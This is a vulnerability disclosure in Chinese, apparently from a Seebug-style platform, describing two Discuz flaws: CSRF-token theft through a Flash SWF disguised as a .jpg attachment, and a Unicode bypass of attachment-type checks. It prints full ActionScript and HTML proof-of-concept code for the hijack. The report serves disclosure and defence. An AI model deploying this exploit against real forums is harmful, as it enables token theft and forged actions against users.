Discuz跨域数据劫持＋附件类型限制绕过

### 简要描述： 两个凑一块发了 ### 详细说明： #1 跨域数据劫持（csrf token formhash盗取） 下载远程附件功能不会对文件内容（文件格式）进行检测导致可以上传恶意的swf文件（扩展名还是图片扩展名），进而进行跨域数据劫持： 伪造图片CrossDomainDataHijack.jpg相关代码： ``` package com.powerflasher.SampleApp { import flash.external.ExternalInterface; import flash.display.Sprite; import flash.display.Sprite; import flash.events.Event; import flash.net.URLLoader; import flash.net.URLRequest; import flash.text.TextField; import flash.text.TextFieldAutoSize; import flash.xml.*; import flash.events.IOErrorEvent; import flash.events.*; import flash.net.*; /** * @author User */ public class CrossDomainDataHijack extends Sprite { private var loader:URLLoader; public function CrossDomainDataHijack() { loader = new URLLoader(); configureListeners(loader); var target:String = root.loaderInfo.parameters.input; var request:URLRequest = new URLRequest(target); try { loader.load(request); } catch (error:Error) { sendDatatoJS("Unable to load requested document; Error: " + error.getStackTrace()); } } private function configureListeners(dispatcher:IEventDispatcher):void { dispatcher.addEventListener(Event.COMPLETE, completeHandler); dispatcher.addEventListener(Event.OPEN, openHandler); dispatcher.addEventListener(ProgressEvent.PROGRESS, progressHandler); dispatcher.addEventListener(SecurityErrorEvent.SECURITY_ERROR, securityErrorHandler); dispatcher.addEventListener(HTTPStatusEvent.HTTP_STATUS, httpStatusHandler); dispatcher.addEventListener(IOErrorEvent.IO_ERROR, ioErrorHandler); } private function completeHandler(event:Event):void { var loader:URLLoader = URLLoader(event.target); //trace("completeHandler: " + loader.data); sendDatatoJS("completeHandler: " + loader.data); } private function openHandler(event:Event):void { //trace("openHandler: " + event); sendDatatoJS("openHandler: " + event); } private function progressHandler(event:ProgressEvent):void { //trace("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal); sendDatatoJS("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal); } private function securityErrorHandler(event:SecurityErrorEvent):void { //trace("securityErrorHandler: " + event); sendDatatoJS("securityErrorHandler: " + event); } private function httpStatusHandler(event:HTTPStatusEvent):void { //trace("httpStatusHandler: " + event); sendDatatoJS("httpStatusHandler: " + event); } private function ioErrorHandler(event:IOErrorEvent):void { //trace("ioErrorHandler: " + event); sendDatatoJS("ioErrorHandler: " + event); } private function sendDatatoJS(data:String):void{ trace(data); ExternalInterface.call("sendToJavaScript", data); } } } ``` POC页面相关代码： ``` ><head> <title>steal CSRF tokens by upload a fake image(flash) file on target site</title> </head><body><h1 align="center">steal CSRF tokens by upload a fake image(flash) file on targe site</h1> <script> function sendToJavaScript(strData){ var theDiv = document.getElementById("HijackedData"); var content = document.createTextNode(strData); theDiv.appendChild(content); theDiv.innerHTML += '<br/>' //alert(strData); } function refreshObjectTag(){ var newURL = document.getElementById('flashFile').value +"?input="+document.getElementById('target').value; var newObjectTag = createSwfObject(newURL,{id: 'myObject', width: 100, height: 100, 'AllowScriptAccess': 'always'},{'AllowScriptAccess': 'always'}) document.body.removeChild(document.getElementById("myObject")); document.body.appendChild(newObjectTag); } var createSwfObject = function(src, attributes, parameters) { var i, html, div, obj, attr = attributes || {}, param = parameters || {}; attr.type = 'application/x-shockwave-flash'; if (window.ActiveXObject) { attr.classid = 'clsid:d27cdb6e-ae6d-11cf-96b8-444553540000'; param.movie = src; } else { attr.data = src; } html = '<object'; for (i in attr) { html += ' ' + i + '="' + attr[i] + '"'; } html += '>'; for (i in param) { html += '<param name="' + i + '" value="' + param[i] + '" />'; } html += '</object>'; div = document.createElement('div'); div.innerHTML = html; obj = div.firstChild; div.removeChild(obj); return obj; }; </script> File: <input id="flashFile" size="100" value="http://x55.me/CrossDomainDataHijack.jpg" type="text"> Page: <input id="target" size="100" value="http://x55.me/csrf.php" type="text"> <input value="start to steal some CSRF tokens" onclick="refreshObjectTag()" type="button"> <div id="HijackedData"></div> <object id="myObject"></object> </body></html> ``` 获取formhash截图： [<img src="https://images.seebug.org/upload/201406/1714085039b57ad052dadecf7246713abf24953a.png" alt="123.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/1714085039b57ad052dadecf7246713abf24953a.png) #2 绕过附件类型限制用到的是上次有讲到的Hacking with Unicode上面的小trick。这个算BUG吧，算不上安全漏洞 起码暂时我还没能把它联系到漏洞上面。可以选择性修复： [<img src="https://images.seebug.org/upload/201406/17141236a7f9fe8f5b7f9ff395c026d06f5f84a7.png" alt="123333.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/17141236a7f9fe8f5b7f9ff395c026d06f5f84a7.png) 测试： [<img src="https://images.seebug.org/upload/201406/17141550e070cd786288bfc9df2fb2666a06626b.png" alt="12444444.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/17141550e070cd786288bfc9df2fb2666a06626b.png) 成功绕过： [<img src="https://images.seebug.org/upload/201406/17141607e933c6e17d1fcfc0de4512112fd6d443.png" alt="125555555.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/17141607e933c6e17d1fcfc0de4512112fd6d443.png) ### 漏洞证明： 证明如上